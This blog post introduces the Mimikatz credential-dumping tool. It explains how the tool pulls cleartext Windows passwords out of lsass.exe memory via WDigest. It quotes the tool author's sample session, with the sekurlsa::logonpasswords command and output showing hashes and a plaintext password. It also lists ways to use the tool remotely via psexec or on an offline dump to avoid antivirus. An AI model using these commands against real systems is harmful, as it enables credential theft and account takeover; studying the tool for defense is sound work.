Mimikatz: A nasty little piece of awesomeness

Today I’m going to tell you about a surprisingly powerful and easy to use nasty little tool called Mimikatz.

In a nutshell, it grabs the passwords in clear text (!) from memory by injecting a DLL into lsass.exe – the process that manages local security on the system. Without the need to get into the technicalities of it, this tool allows anyone to grab the plain text passwords of everyone that has recently logged onto the system (and whose password is still in memory).

Traditionally, authentication to NTLM or kerberos happens by passing the hashed password to the authentication server. As we know, hashing is a one-way function, meaning the original password cannot be recovered from the hash alone (yes, I know that’s not entirely true and there are ways to recover it, but certain conditions make it computationally infeasible, so bear with me). Since the hash is only being passed around, the original password remains safe.

With mimikatz though, you can retrieve the original password from memory. The reason is that Digest Authentication requires wdigest (the user’s plain text password) – not just the hash – to be known to the authenticating server for certain authentication scheme (like SASL and HTTP Digest Auth).

Example from the author’s site:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
Authentication Id : 0 ; 515764 (00000000:0007deb4)
Session           : Interactive from 2
User Name         : Gentil Kiwi
Domain            : vm-w7-ult-x
SID               : S-1-5-21-1982681256-1210654043-1600862990-1000
        msv :
         [00000003] Primary
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * LM       : d0e9aee149655a6075e4540af1f22d3b
         * NTLM     : cc36cf7a8514893efccd332446158b1a
         * SHA1     : a299912f3dc7cf0023aef8e4361abfc03e9a8c30
        tspkg :
         * Username : Gentil Kiwi
         * Domain   : vm-w7-ult-x
         * Password : waza1234/
...

 

Details:

 

Uses:

  • Can run locally to harvest passwords of all logged on users
  • Can run remotely using psexec to harvest remote machine’s passwords
  • Can create a dump file from lsass.exe on local machine and harvest creds offline to avoid getting tagged by AV

There are plenty of blog posts online detailing the various ways one can get creative using this tool, so I won’t give you more ideas here, there’s even a Metasploit module for it! Here a few that I really liked:

http://blog.gentilkiwi.com/mimikatz (author’s site)

http://pentestmonkey.net/blog/mimikatz-tool-to-recover-cleartext-passwords-from-lsass

http://carnal0wnage.attackresearch.com/2013/07/mimikatz-minidump-and-mimikatz-via-bat.html

 

354 Comments



































































































































































































































































































































































Comments are closed, but trackbacks and pingbacks are open.